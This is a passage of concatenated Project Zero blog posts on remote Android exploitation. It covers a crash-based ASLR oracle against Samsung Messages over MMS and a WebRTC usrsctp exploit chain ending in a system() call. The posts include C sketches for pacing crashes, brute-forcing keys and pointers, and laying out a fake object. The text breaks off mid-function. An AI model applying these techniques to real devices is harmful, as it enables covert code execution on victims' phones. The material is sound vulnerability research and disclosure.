One simple technique we can use to improve the reliability of the attack is to have each oracle MMS processed with a relatively clean state of the heap. This can be accomplished by unconditionally crashing the client app with a malformed Qmage file, causing the com.samsung.android.messaging process to be killed and restarted from scratch when the next message arrives on the phone. Of course the ASLR oracle output false already implies a crash taking place, so extra artificial crashes are only needed at the very beginning of the attack (before the first oracle query), and after each query returning true. The type of the artificial crash doesn't matter as long as it always reproduces; it can be a huge out-of-bounds read/write, a NULL pointer dereference, assertion failure, or any condition that doesn't depend on the existing state of the process to trigger a crash. In my exploit, I used the signal_sigsegv_400357fc6c_7014_c1d4fedf1cbcdd583e0f331f32df1f72.qmg sample from crash 39b052a01c99f60982ec92f8d01a5401, which accesses a NULL pointer returned by a malloc call with a negative integer passed as the size.

This one trick allowed me to achieve an oracle accuracy rate of more than 99% (loose estimate) on my Galaxy Note 10+ test device. In my case, it was sufficient to completely rely on each single measurement to successfully defeat ASLR without making any mistakes during the process, but your mileage may vary depending on the device model, Android version, existing history of messages in the SMS app, or even specific options enabled on the phone (such as WiFi) during the attack. If the oracle accuracy drops below a certain threshold, it may be necessary to introduce redundant memory probes sent to the target for each tested address range, and only return the output value to the higher levels of the exploit code once there is enough confidence about its validity.

ActivityManager and crash rate limiting on Android

Based on what we know so far, we can assume that any potential attack will involve a number of crashes of Samsung Messages on the victim phone, some of them carrying address space information and some triggered simply to reset the heap. The ability to repeatedly crash an app and have it restarted on a remote device is a crucial requirement, so we should verify that this is actually possible on Android. If we send corrupted Qmages via MMS twice in a short span of time, we will observe two crashes, as expected:

d2s:/data/local/tmp $ logcat -b crash -v time
07-23 15:52:45.549 F/libc    ( 8930): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10606 (pool-5-thread-1), pid 8930 (droid.messaging)
[...]
07-23 15:52:55.517 F/libc    (10727): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10776 (pool-5-thread-1), pid 10727 (droid.messaging)
[...]

If we then send a third message, Samsung Messages won't be spawned to handle it. Instead, we'll see the following message:

07-23 15:54:28.639 23268 23317 W BroadcastQueue: Unable to launch app com.samsung.android.messaging/10128 for broadcast Intent { act=android.provider.Telephony.WAP_PUSH_DELIVER typ=application/vnd.wap.mms-message flg=0x18000010 cmp=com.samsung.android.messaging/.ui.receiver.smsmms.DefaultSmsAppMmsReceiver (has extras) }: process is bad

At this point, we (as the attacker) are cut off from the device and cannot reach or interact with the remote Qmage attack surface anymore. In fact, the victim won't be able to receive SMS/MMS from anyone until they manually start the Messages app again. So what happened here, and does it mean that all our efforts up to this point were in vain?

When I first saw the warning, I immediately went looking for clues at cs.android.com. It was easy to locate the culprit based on the "process is bad" string: it is printed out when a call to mService.startProcessLocked fails in BroadcastQueue.java. This may generally only happen when mService.mAppErrors.isBadProcessLocked returns true for the app in question:

boolean isBadProcessLocked(ApplicationInfo info) {
      return mBadProcesses.get(info.processName, info.uid) != null;
}

There is a list of bad processes in the system, but how does an app end up on that list? The answer can be found in the handleAppCrashLocked method in AppErrors.java, and specifically in the following lines (slightly reformatted for readability):

if (crashTime != null && now < crashTime + ProcessList.MIN_CRASH_INTERVAL) {
    // The process crashed again very quickly.
    // If it was a bound foreground service, let's try to restart again in a
    // while, otherwise the process loses!
    Slog.w(TAG, "Process " + app.info.processName
            + " has crashed too many times: killing!");
[...]
           mBadProcesses.put(app.info.processName, app.uid,
                    new BadProcessInfo(now, shortMsg, longMsg, stackTrace));

In the above snippet, now is the current timestamp and crashTime is the time of the last crash of the app. Accordingly, the logic checks if two crashes in a single app have occurred in a short period of time, and if so, it bans the process indefinitely from future restarts. How short is short? Let's look up the MIN_CRASH_INTERVAL constant in ProcessList.java:

// The minimum time we allow between crashes, for us to consider this
// application to be bad and stop and its services and reject broadcasts.
static final int MIN_CRASH_INTERVAL = 60 * 1000;

It's 60 seconds. From the attacker's point of view, this is certainly not perfect, but also not terribly bad. This logic of the ActivityManager service means that we must never trigger two crashes of the Messages app within one minute, or the attack will be halted. In the context of our ASLR oracle, it limits the probing rate to one query per minute, which may or may not be acceptable depending on how many queries are required to break ASLR. For example, if we consider a realistic attack to be carried out during the night, that leaves us with a maximum of 8 hours × 60 minutes ~= 480 queries. The good news (for exploitation) is that there is no absolute limit on the number of crashes for a single app, so we can interact with the MMS client indefinitely as long as we slow down the communication to meet the crash interval condition.

The diagram below illustrates the high-level process of safely sending two ASLR oracle queries to a target phone, taking the mandatory cooldown period into account. The first query returns true and takes two MMS to complete (one probe and one unconditional crash), and the second one returns false. Note how there is always a guaranteed 60 second gap between two subsequent crashes on the recipient device:

The process of sending two subsequent ASLR oracle queries to the target phone

On a closing note, there is one more important detail to consider in the crash handling logic. If we look closely at the source code of the handleAppCrashLocked method, we can notice that the timestamp is obtained through the SystemClock.uptimeMillis() API:

       final long now = SystemClock.uptimeMillis();

As the documentation states, this is not exactly the wall clock time we have assumed it to be:

uptimeMillis() is counted in milliseconds since the system was booted. This clock stops when the system enters deep sleep (CPU off, display dark, device waiting for external input), but is not affected by clock scaling, idle, or other power saving mechanisms. This is the basis for most interval timing such as Thread#sleep(long), Object#wait(long), and System#nanoTime. This clock is guaranteed to be monotonic, and is suitable for interval timing when the interval does not span device sleep. Most methods that accept a timestamp value currently expect the uptimeMillis() clock.

According to my experimentation on the Galaxy Note 10+ device, when the phone is in an inactive state (e.g. set aside on a bedside table with the display off), the clock indeed doesn't progress. This makes practical zero-click exploitation even more challenging, as it is not enough to just wait for 60 seconds before sending the next MMS. Instead, the attacker has to keep the target phone somehow occupied for those 60 seconds, while not triggering any vibration/notification sounds at the same time. The most obvious way to achieve this is through the cellular network, and I have identified at least three techniques that could be used to silently and remotely keep a phone busy:

  • By sending an MMS with empty text (i.e. an empty text/plain MIME file), a few seconds can be wasted while the phone receives and processes the message. In the end, the empty text leads to an unhandled Java exception being thrown in the Messages app, preventing it from showing any notification to the user. I abused this behavior in my exploit to send an initial "ping" to quietly verify that the recipient phone is responsive (see 0:43-0:56 in the exploit demo). It has been fixed in Samsung Messages since version 11.1.0.61.
  • By sending an MMS with very long text (at least around 140 kB in my testing), a few seconds can be similarly wasted by the victim phone. In this corner case, the misbehavior is slightly different and varies between devices, as the unhandled Java exception is thrown in the midst of generating a user notification, when it is already displayed on the screen, but before the notification sound rings. As such, it also qualifies as a (literally) silent CPU cycle burning trick.
  • By sending a very long SMS of 5180+ characters, which is divided into 34 segments of 153 characters each. The target phone starts receiving the SMS segments, roughly one per second, but for some reason (I didn't investigate this deeply) it stops reassembling the message after the 33rd part, and abandons it completely without generating any notifications. During the process of receiving and saving the initial portions of the SMS in the internal database, the uptimeMillis clock progresses by around 35 seconds in my test setup.

These are some basic ideas for ways to transmit data to the phone such that it has to spend cycles processing it, but fails at some point before notifying the owner. I am sure many more similar techniques exist, and specialized software such as NowSMS certainly helps put the relevant mobile apps to the test against very unusual conditions. All in all, the nature of the uptimeMillis clock is not a fundamental barrier in remote Android exploitation, but it is an annoying aspect that needs to be addressed with the use of additional techniques, and it may extend the overall attack time and impair its reliability. With 60 seconds of active CPU time required between each ASLR oracle query, we might also start being concerned about the extent of power consumption induced by the exploit on target phones with low battery levels… :)
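
To make the pacing concrete, here is a sketch of how an exploit driver could burn the required active time between crashes. The helper functions and per-message timing estimates are assumptions based on the observations above, not code from the actual exploit:

/* Hypothetical senders for the "silent busy-work" messages described above. */
extern void send_long_sms(void);          /* ~35 seconds of uptime in my test setup */
extern void send_empty_text_mms(void);    /* a few seconds of uptime per message    */

/* Keep the target's uptimeMillis clock moving for at least 60 seconds of
 * active time before the next crash-inducing message, without triggering
 * any user-visible notifications. */
static void burn_crash_interval(void)
{
        int burned_seconds = 0;

        send_long_sms();
        burned_seconds += 35;

        while (burned_seconds < 60) {
                send_empty_text_mms();
                burned_seconds += 5;      /* conservative per-message estimate (assumption) */
        }
}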

Summary

In this episode, we set up an environment to programmatically send MMS messages from a Windows PC, and learned the basics of the client ⟷ MMSC MM1 protocol and its encapsulation encoding. This enabled us to specify the X-Mms-Delivery-Report header in outgoing messages, and abuse the delivery report feature to establish a 1-bit side channel indicating if the recipient's Messages app crashed while processing our malformed Qmage image or not. Based on this capability and the address-probing primitive built in Part 3, we now have a fully functional (albeit somewhat slow) ASLR oracle at our disposal. We are getting close to defeating ASLR and finally executing arbitrary code.

To make further progress in the research, we have to face a few remaining questions:

  • What types of addresses are we interested in leaking? Which libraries will be needed to achieve RCE, and do we also need to disclose any data locations?
  • How do we find any regions in memory at all, starting with absolutely no initial insight as to where they might be located?
  • Finally, how do we achieve this in a relatively small number of steps (preferably low hundreds), such that the attack has a realistic execution time?

All of these matters will be discussed in detail in the upcoming Part 5. Stay tuned!
✇Google Project Zero

Exploiting Android Messengers with WebRTC: Part 2

By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 3 is scheduled for August 6.

Part 2: A Better Bug


In Part 1, I explored whether it was possible to exploit WebRTC using two memory corruption bugs in RTP processing. While I succeeded at moving the instruction pointer, I was not able to break ASLR, so I decided to look for vulnerabilities more suitable for this purpose.

usrsctp


I started off by going through WebRTC bugs I had filed in the past to see if any had the potential to break ASLR. Even if a bug was fixed long ago, it is an indicator of where similar bugs could potentially be found. One such bug was CVE-2020-6831, a stack buffer overflow in usrsctp.

usrsctp is an implementation of Stream Control Transmission Protocol (SCTP) used by WebRTC. Applications that use WebRTC can open data channels, which allow text or binary data to be transmitted from peer to peer. Data channels are often used to allow text messages to be exchanged during a video call, or to tell a peer when certain events have occurred, such as another peer disabling its camera. SCTP is the protocol that underlies data channels. In WebRTC, SCTP is analogous to RTP in that where RTP is used for audio and video content, SCTP is used for data.

I spent some time reviewing the usrsctp code for vulnerabilities, starting with CVE-2020-6831. This bug gives the attacker complete control of the size and contents of the overflow. Samuel Groß suggested that this bug could be used to break ASLR by overwriting the stack cookie, and then the return address, one byte at a time, detecting whether each guessed value is correct based on whether the application crashes. Unfortunately, it turned out that this vulnerability is not reachable through WebRTC, as it requires a client socket to connect to a listening socket, whereas in WebRTC both sockets are client sockets.
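
For completeness, the general shape of that byte-at-a-time approach is sketched below; overflow_survives is a hypothetical oracle standing in for the crash-or-no-crash signal, and as noted above, this technique was never actually usable here because the bug is not reachable from WebRTC:

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical oracle: perform the overflow so that the already-recovered
 * bytes plus one guessed byte overwrite the targeted value (stack cookie,
 * then return address), and report whether the remote process survived. */
extern bool overflow_survives(const uint8_t *known, size_t known_len, uint8_t guess);

/* Recover an 8-byte value one byte at a time: a wrong guess corrupts the
 * value and crashes the target, the right guess leaves it running. At most
 * 8 * 256 attempts instead of 2^64. */
static uint64_t brute_force_value(void)
{
        uint8_t known[8] = {0};
        uint64_t value = 0;

        for (size_t i = 0; i < sizeof(known); i++) {
                for (int guess = 0; guess <= 0xff; guess++) {
                        if (overflow_survives(known, i, (uint8_t)guess)) {
                                known[i] = (uint8_t)guess;
                                break;
                        }
                }
        }
        for (size_t i = 0; i < sizeof(known); i++)
                value |= (uint64_t)known[i] << (8 * i);
        return value;
}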

I kept looking and eventually found CVE-2020-6514. This is a rather unusual bug in how WebRTC interacts with usrsctp. usrsctp supports custom transports, in which case the integrator needs to provide the source and destination address for each connection as a pair of void pointers. The non-dereferenced value of these pointers is then used as an address by usrsctp, which means the value is included in some packets. In WebRTC, the address pointers are set to the address of the SctpTransport instance used by WebRTC. The result is that the location of this object in memory is sent to the remote peer during every SCTP connection. This is technically a bug in WebRTC, though the design of usrsctp is also flawed because using the type void* for custom addresses strongly encourages integrators to use pointers for this value even though this is insecure.
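
The problematic pattern boils down to something like the sketch below. usrsctp_register_address and usrsctp_conninput are the usrsctp entry points used with custom transports; the structure and function names around them are illustrative, not WebRTC's actual integration code:

#include <stddef.h>
#include <usrsctp.h>

struct my_transport;   /* stands in for WebRTC's cricket::SctpTransport */

static void register_connection(struct my_transport *t)
{
        /* The raw heap address of the transport object becomes the usrsctp-level
         * "address" of this connection... */
        usrsctp_register_address((void *)t);
}

static void on_packet_from_network(struct my_transport *t, const void *data, size_t len)
{
        /* ...and is attached to every inbound packet. usrsctp later embeds this
         * value in data it sends back out, leaking the pointer to the remote peer. */
        usrsctp_conninput((void *)t, data, len, 0);
}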

I was hoping this bug would be enough to break ASLR, but it turned out not to be. For an exploit, I needed the location of a loaded library, as well as the location of the heap, so I ran a series of tests on an Android device to see if there was any correlation between these locations, but there was not any. The location of a heap pointer was not enough to determine the location of a loaded library.

I kept looking, and I noticed a vulnerability in how usrsctp processes ASCONF chunks, which are used to manage dynamic IP addresses. The source for the bug is as follows.

if (param_length > sizeof(aparam_buf)) {
        SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) larger than buffer size!\n", param_length);
        sctp_m_freem(m_ack);
        return;
}

if (param_length <= sizeof(struct sctp_paramhdr)) {
        SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) too short\n", param_length);
        sctp_m_freem(m_ack);
}

Notice that the second call to sctp_m_freem is missing a return, so the m_ack variable can be used after it is freed. After finding this bug, I noticed that it had been patched in more recent versions of usrsctp and WebRTC. I later learned that it was reported by another Googler, Mark Wodrich, as Bug 376 in usrsctp on September 19, 2019.
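
For reference, the eventual fix boils down to adding the missing return after the buffer is freed; a sketch of the corrected branch (not the verbatim upstream patch):

if (param_length <= sizeof(struct sctp_paramhdr)) {
        SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) too short\n", param_length);
        sctp_m_freem(m_ack);
        return;   /* previously missing: without it, the freed m_ack is used later */
}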

Revealing Memory with Bug 376


Two important questions in analyzing a use-after-free bug are what is freed, and how it is used. In Bug 376, the freed object is an mbuf structure, a type which is used to store the contents of inbound and outbound packets. The mbuf structure starts with a substructure, m_hdr, which is defined as follows.

struct m_hdr {
        struct mbuf  *mh_next;        /* next buffer in chain */
        struct mbuf  *mh_nextpkt;     /* next chain in queue/record */
        caddr_t       mh_data;        /* location of data */
        int           mh_len;         /* amount of data in this mbuf */
        int           mh_flags;       /* flags; see below */
        short         mh_type;        /* type of data in this mbuf */
        uint8_t       pad[M_HDR_PAD]; /* word align */
};

Now, how is this structure used? Looking through the rest of the ASCONF handling, it is eventually added to an outbound packet queue to acknowledge the packet that was sent.

TAILQ_INSERT_TAIL(&stcb->asoc.asconf_ack_sent, ack, next);

This made it very likely that this bug could be used to reveal memory of a remote peer if the freed mbuf structure was replaced with a structure containing a pointer to memory that itself contains pointers, for example the SctpTransport pointer revealed by CVE-2020-6514.

I tried to do this by sending RTP packets of the same size as the mbuf structure. There’s a nice trick for making a lot of allocations of a specific size that don’t get freed in WebRTC. Video packets get stored in a list before they are assembled into frames, so if the end of a frame is never sent, they will get stored forever, so long as a maximum number of packets is never hit. Unfortunately, this led to an unexpected problem. OpenSSL, which is used by WebRTC, happened to have some heap allocations of the same size as an mbuf structure, and if one of them was allocated in the place of the freed mbuf structure, it would get written to in the mbuf send process, which for some reason would lead to an irrecoverable state in OpenSSL. The application didn’t crash; it would just get stuck in some sort of loop and refuse to accept any more connections.

So I decided it would be better to allocate the memory replacing the mbuf structure in usrsctp. SCTP allows packets containing any number of chunks to be sent to a host, and in most cases they are processed as if they were a sequence of packets. Even better, the outbound packet queue that the freed mbuf structure is added to does not send any packets until all chunks in the current packet have been processed. This means that it should be possible to send a packet that contains a chunk that triggers the bug, and then a chunk that sets the freed memory to the needed values before it is sent back to the attacker. Since no network traffic needs to occur between when the mbuf structure is freed and when its memory is safely reallocated, this avoids the problem with OpenSSL.

Unfortunately, there are very few calls to malloc in usrsctp with sizes that are controllable by incoming traffic, and none of them allow the entire packet contents to be specified. The best I could find was in the processing of a data stream reset chunk. The code is as follows, with some parts removed for clarity.

if (asoc->str_reset_seq_in == seq) {
        len = ntohs(req->ph.param_length);
        number_entries = ((len - sizeof(struct sctp_stream_reset_out_request)) / sizeof(uint16_t));
        tsn = ntohl(req->send_reset_at_tsn);
        asoc->last_reset_action[1] = asoc->last_reset_action[0];
        if (...) {
                ...
        } else if (SCTP_TSN_GE(asoc->cumulative_tsn, tsn)) {
                /* we can do it now */
                ...
        } else {
                /*
                 * we must queue it up and thus wait for the TSN's
                 * to arrive that are at or before tsn
                 */
                struct sctp_stream_reset_list *liste;
                int siz;
                siz = sizeof(struct sctp_stream_reset_list) + (number_entries * sizeof(uint16_t));
                SCTP_MALLOC(liste, struct sctp_stream_reset_list *, siz, SCTP_M_STRESET);
                if (liste == NULL) {
                        /* gak out of memory */
                        asoc->last_reset_action[0] = SCTP_STREAM_RESET_RESULT_DENIED;
                        sctp_add_stream_reset_result(chk, seq, asoc->last_reset_action[0]);
                        return;
                }
                liste->seq = seq;
                liste->tsn = tsn;
                liste->number_entries = number_entries;
                memcpy(&liste->list_of_streams, req->list_of_streams, number_entries * sizeof(uint16_t));
                TAILQ_INSERT_TAIL(&asoc->resetHead, liste, next_resp);

This code allocates the liste structure, which can be used to replace the freed mbuf structure. It has one really lucky feature, which is that the next_resp property, which lines up with the mh_next property of the mbuf structure happens to be of the correct type, also mbuf. This would cause problems if it were another type, as usrsctp iterates through the entire mbuf chain before sending a packet.

A less lucky feature is that the properties that line up with the mh_data property of the mbuf structure happen to be the current reset sequence number and the transmission sequence number (TSN). Both of these are subject to a number of checks in this method. The reset sequence number needs to be exactly equal to the sequence number set when the connection was initialized, either in an INIT or COOKIE_ECHO chunk, and also needs to be equal to the lower four bytes of the SctpTransport pointer. This check can be passed by sending a COOKIE_ECHO chunk that sets the reset sequence number to the needed value before triggering the bug.
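
To visualize the overlap, here is a rough sketch of how the replacement allocation lines up with the freed mbuf header, assuming the usual 64-bit little-endian layout; the exact offsets are my own reading of the structures above rather than something stated in the original code:

/*
 *  offset   struct m_hdr (freed)     struct sctp_stream_reset_list (replacement)
 *  ------   --------------------     -------------------------------------------
 *  0x00     mh_next                  next_resp (first TAILQ pointer)
 *  0x08     mh_nextpkt               next_resp (second TAILQ pointer)
 *  0x10     mh_data                  seq (low 4 bytes) + tsn (high 4 bytes)
 *  0x18     mh_len, mh_flags         number_entries, start of list_of_streams
 */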

More challenging is the check that is performed on the TSN. It is compared to the cumulative TSN, which is originally set to the same value as the reset sequence number. The actual comparison performed is a ‘sequence number greater than’, which determines whether one value is ahead of or behind another value, assuming sequence numbers that roll over to zero when all bits are set. For example, if the current sequence number is 0xFFFFFFFF, the value 2 would pass a  ‘sequence number greater than’ check, but the values 0xFFFFFFFE and 0x80000001 would fail. The TSN read out of the incoming packet has to be the top four bytes of the SctpTransport pointer, meanwhile the cumulative TSN has to be the bottom four bytes of this pointer because it is the same value as the reset sequence number. So this is actually a comparison between the two halves of the pointer. The TSN is a small number, less than 0x80 because it is the top of a pointer, so this comparison will return true roughly whenever bit 31 of the pointer is not set, and return the desired outcome of false roughly whenever it is set.
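
The comparison semantics are easy to get wrong, so here is a small standalone C program reproducing the serial-number arithmetic with the examples above. This is an illustration of the check, not usrsctp's actual SCTP_TSN_GE macro:

#include <stdint.h>
#include <stdio.h>

/* "Serial number greater than or equal": a is at or ahead of b when the
 * forward distance from b to a, modulo 2^32, is less than half the space. */
static int tsn_ge(uint32_t a, uint32_t b)
{
        return (uint32_t)(a - b) < 0x80000000u;
}

int main(void)
{
        uint32_t cur = 0xFFFFFFFFu;

        printf("%d\n", tsn_ge(2, cur));           /* 1: ahead of cur after wrap-around */
        printf("%d\n", tsn_ge(0xFFFFFFFEu, cur)); /* 0: one step behind cur */
        printf("%d\n", tsn_ge(0x80000001u, cur)); /* 0: more than half the space away */
        return 0;
}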

Bit 31 of the pointer is determined randomly by ASLR as well as where the SctpTransport instance is allocated on the heap, which means it is set about 50% of the time. Normally, I would be okay with an exploit being 50% effective, because that means it would probably succeed with a few tries, but in this case, that’s not true because it will have the tendency to fail again and again on the same ASLR layout. ASLR layout is determined when an Android device is started up, and doesn’t change again until it is rebooted. So I needed a way to change the cumulative TSN after the reset sequence number has been set.

It turns out that this is possible using the FWD_TSN chunk type, which allows a peer to request that another peer move its cumulative TSN up to 4096 bytes forward. It’s possible to move the cumulative TSN forward enough that bit 31 flips by sending this chunk type repeatedly. This takes quite a few chunks, but by combining many chunks into each packet and sending the packets as fast as possible, the bit can be flipped in a few seconds.

Putting this all together, the bug can be used to make the target device send back the memory of the SctpTransport instance, which contains a pointer to the class’s vtable, finally giving the location of the WebRTC library and breaking ASLR.

Thinking about it a bit, I didn’t think the WebRTC library would be the best library to use for my exploit, as it’s not unusual for WebRTC integrators to statically link it with other libraries and use all sorts of toolchains. It would be easier to know the location of libc, which comes from the Android system and has less variation. So I added a second usage of this bug that reads the location of malloc from the global offset table, which is a fixed offset from the SctpTransport vtable that has already been read. This allows the location of libc to be calculated.

Moving the Instruction Pointer (Again)


In Part 1, I figured out how to use an RTP memory corruption bug to move the instruction pointer, but after I filed CVE-2020-6514, Jann Horn suggested that it might be possible to use this bug to move the instruction pointer as well. When WebRTC uses the SctpTransport pointer as an address, it doesn’t just use it to identify the connection, but it actually casts the pointer to class SctpTransport, and makes virtual calls on it when sending outbound packets received from usrsctp.

Meanwhile, usrsctp usually determines the address for outbound packets based on identifiers in the packet, but there is one situation where it extracts the address from the packet itself: when processing COOKIE_ECHO chunks. Normally, it wouldn’t be possible to put an untrusted pointer in this chunk type, as cookies are usually echoed from an incoming packet and need to be signed. However, Jann noticed that the random number generation for the signing key is very weak. The following code gets called when usrsctp is initialized.

srandom(getpid()); 

The secret key used for signing cookies is then generated from this seeded random number generator.

The INIT chunk sent when starting an SCTP connection contains a randomly generated key used for authentication, generated by the same random number generator used for the secret key. I wrote a script that determines the value of the remote PID based on this key, by calling srand on every number between 0 and 70 000, and seeing which one causes the random number generator to produce the same authentication key. It is then possible to infer the value of the secret key.
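
As a rough illustration of the brute force, assuming for the sketch that the observed key is made of consecutive outputs of the seeded generator (the exact derivation and which libc call usrsctp uses may differ):

#include <stdint.h>
#include <stdlib.h>

/* Try every plausible PID as a seed and check whether it reproduces the
 * random authentication key observed in the remote peer's INIT chunk. */
static long recover_remote_pid(const uint32_t *observed_key, size_t key_words)
{
        for (long pid = 0; pid <= 70000; pid++) {
                srandom((unsigned int)pid);   /* same seeding as usrsctp's init code above */
                size_t i;
                for (i = 0; i < key_words; i++) {
                        if ((uint32_t)random() != observed_key[i])
                                break;
                }
                if (i == key_words)
                        return pid;           /* seed recovered: the secret key can now be recomputed */
        }
        return -1;
}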

This key now allows the attacking device to send COOKIE_ECHO chunks with any contents, including changing the address to a custom pointer. This allows the instruction pointer to be moved, as a virtual call will be made on whatever address is provided the next time an outbound packet is sent, which happens immediately when the peer responds with a COOKIE_ACK. In the above section, I also discussed using COOKIE_ECHO packets to change the reset sequence number, while glossing over how I was actually sending them. It was using this same method.

I now had two possible methods for setting the instruction pointer in the exploit. I chose to move forward with this one, as it uses usrsctp, which is also necessary to break ASLR, meanwhile the RTP one uses a different feature. I felt that reducing the number of features needing to be enabled for this exploit to work would increase the number of applications it worked on, as sometimes applications disable specific WebRTC features.

Putting it All Together


Having all the necessary capabilities for an exploit, I then needed to put them all together. My general strategy was to make a fake object on the heap at a known location, and then make a virtual call on that object. The fake object would have a fake vtable in the same buffer that would point to system, which would run a shell command.

One missing piece is how to populate heap memory at a known location. One possibility was to use RTP to allocate memory of the same size as the SctpTransport object, hoping it gets allocated at the address directly after the object, or at a predictable location. I tried this, and it worked maybe 50% of the time, but considering I had a way to read memory, I thought I could do better.

I noticed that the SctpTransport class contains a CopyOnWriteBuffer object named partial_incoming_message_ that is sometimes used to store incoming SCTP data. SCTP supports data fragmentation, and usrsctp passes incomplete fragmented packets to WebRTC if they get above a certain size. These are stored in the partial_incoming_message_ object until the rest of the packet is received. So I thought if I sent the data for the fake object over SCTP to the target device, it would eventually populate this buffer, and I could read the address. (Note that this actually requires two reads, as there are two levels of indirection between a CopyOnWriteBuffer object and its backing data.)

I tried this, and it worked, but there was another problem. In order to create a fake object with a fake vtable, the fake object needed to reference itself, but this method only allowed me to know the location of the memory after it had been written to and couldn’t be changed. I looked a bit closer at how this functionality works. The code for setting the buffer is as follows.

transport->partial_incoming_message_.AppendData(
          reinterpret_cast<uint8_t*>(data), length);
          ...
if (!(flags & MSG_EOR) && (transport->partial_incoming_message_.size() < kSctpSendBufferSize)) {
        return 1;
      }
...
transport->invoker_.AsyncInvoke<void>(
RTC_FROM_HERE, transport->network_thread_,
rtc::Bind(&SctpTransport::OnInboundPacketFromSctpToTransport,
transport, transport->partial_incoming_message_, params,
flags));
transport->partial_incoming_message_.Clear();

What’s happening here is that incoming data is always immediately appended to the partial_incoming_message_ buffer, and then if it is an incomplete fragment, the function returns. Otherwise, it queues a thread to process the data, and then clears the buffer.

I started to wonder how clearing works, considering the data is still needed by the queued thread that might not be finished yet. It turns out that the  CopyOnWriteBuffer class retains references to the data, and only deletes it if there are zero references left. Otherwise, it decrements the reference count and allocated new data of the current size for the buffer. This means it is possible to read the location of the _incoming_message_ buffer before data is written to it, because it is actually allocated during the clear. So long as the data written by AppendData is shorter or the same size as the largest size ever cleared, this memory will not be reallocated.

This allowed me to create a heap buffer at a known location and populate it. The last step was to figure out what to populate it with. I started out by filling it up with sequential numbers, and then using the address it crashed on to figure out what memory to change. After using the crash locations to create the fake vtable, I ended up with a crash on a branch to X8, and the only other controllable register was X21. X0 was of course set to the location of the fake vtable, as this crash was due to a virtual call, as were X1 and X23.

Astoundingly, libc had the perfect gadget for this situation.

do_nftw(char const*,int (*) …) + 0x138

LDR             X0, [X23,#0x30]
LDR             X1, [X23,#0x70]
BLR             X21

Setting the value that ends up in X21 to the address of system, and placing a pointer to a parameter string at offset 0x30 past the fake vtable, caused system to be called with that parameter!
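
For illustration, the fake object could be laid out roughly as in the sketch below. Only the +0x30 offset comes from the gadget above; the vtable slot offset, the position of the command string, and the way X21 ends up holding system are assumptions for the sketch, not the exploit's actual buffer layout.

#include <stdint.h>
#include <string.h>

/* Build the self-referencing fake object inside a buffer whose address on the
 * target (buf_remote_addr) is already known from the earlier memory reads. */
static void build_fake_object(uint8_t *buf, uint64_t buf_remote_addr,
                              uint64_t gadget_addr, const char *cmd)
{
        uint64_t cmd_remote_addr = buf_remote_addr + 0x80;

        memset(buf, 0, 0x100);
        memcpy(buf + 0x00, &buf_remote_addr, 8);  /* fake vtable pointer: points back into the buffer */
        memcpy(buf + 0x10, &gadget_addr, 8);      /* vtable slot used by the virtual call (offset assumed) */
        memcpy(buf + 0x30, &cmd_remote_addr, 8);  /* loaded into X0 by the gadget: argument for system() */
        strcpy((char *)(buf + 0x80), cmd);        /* the shell command itself */
}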

To give a quick overview, here are the steps required for the exploit, in order:

  1. The PID is determined based on the key in the INIT chunk, and then the secret key is determined
  2. The vtable is read from the SctpTransport object
  3. The location of malloc is read from the global offset table
  4. The partial_incoming_message_ buffer is populated with data of the needed size
  5. The partial_incoming_message_ buffer is cleared, so a new buffer is allocated
  6. The address of the partial_incoming_message_ buffer is read from the SctpTransport object
  7. The address of the partial_incoming_message_ backing buffer is read from the buffer structure
  8. The partial_incoming_message_ buffer is populated with exploit data, based on the location of malloc
  9. The bug is triggered, making a virtual call to a gadget and then system

Now I had an exploit that worked in … the WebRTC sample Android application. Stay tuned for Part 3, where I explore what real Android applications the exploit works on.

✇Google Project Zero

Exploiting Android Messengers with WebRTC: Part 3

By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514, discussed in this blog post, was fixed on July 14 with these CLs. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down.

Part 3: Which Messengers?

In Part 2, I described an exploit for WebRTC on Android. In this section, I explore which applications it works on.

The exploit

When writing the exploit, I originally altered the SCTP packets sent to the target device by altering the source of WebRTC and recompiling it. This wasn’t practical for attacking closed source applications, so I eventually switched to using Frida to hook the binary of the attacking device instead. Frida’s hooking functionality allows for code to be executed before and after a specific native function is called, which allowed my exploit to alter outgoing SCTP packets as well as inspect incoming ones. Functionally, it is equivalent to altering the source of the attacking client, but instead of the alterations being made in the source at compile time, they are made dynamically by Frida at run time. The source for the exploit is available here.

There are seven functions that the attacking device needs to hook, as follows.

usrsctp_conninput // receives incoming SCTP
DtlsTransport::SendPacket // sends outgoing SCTP
cricket::SctpTransport::SctpTransport // detects when SCTP transport is ready
calculate_crc32c // calculates checksum for SCTP packets
sctp_hmac // performs HMAC to guess secret key
sctp_hmac_m // signs SCTP packet
SrtpTransport::ProtectRtp // suppresses RTP to reduce heap noise

These functions can be hooked as symbols, or as offsets in the binary.

There are also three address offsets from the binary of the target device that are needed for the exploit to work.  The offset between the system function and the malloc function, as well as the offset between the gadget described in the previous post and the malloc function are two of these. These offsets are in libc, which is an Android system library, so they need to be determined based on the target device’s version of Android. The offset from the location of the cricket::SctpTransport vtable to the location of malloc in the global offset table is also needed. This must be determined from the binary that contains WebRTC in the application being attacked.
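
For context, this is roughly how those offsets get combined once the vtable pointer has been leaked. read_remote_u64 is a placeholder for the Bug 376 memory-reveal primitive, and the structure and field names are mine, not from the exploit scripts:

#include <stdint.h>

/* The three per-build constants described above (values differ per app and libc build). */
struct target_offsets {
        int64_t vtable_to_malloc_got;   /* cricket::SctpTransport vtable -> malloc slot in the GOT */
        int64_t malloc_to_system;       /* malloc -> system, within libc */
        int64_t malloc_to_gadget;       /* malloc -> the do_nftw gadget, within libc */
};

/* Placeholder for the remote read primitive built on Bug 376. */
extern uint64_t read_remote_u64(uint64_t addr);

static void resolve_addresses(uint64_t leaked_vtable, const struct target_offsets *off,
                              uint64_t *system_addr, uint64_t *gadget_addr)
{
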